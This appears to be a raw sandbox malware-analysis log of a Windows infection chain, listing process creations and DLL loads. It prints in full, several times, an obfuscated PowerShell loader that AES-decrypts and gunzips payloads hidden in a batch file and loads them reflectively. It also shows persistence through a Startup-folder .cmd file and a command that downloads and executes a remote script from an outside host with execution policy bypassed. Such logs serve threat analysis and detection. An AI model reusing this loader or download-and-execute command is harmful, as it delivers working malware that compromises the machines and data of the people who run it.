System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
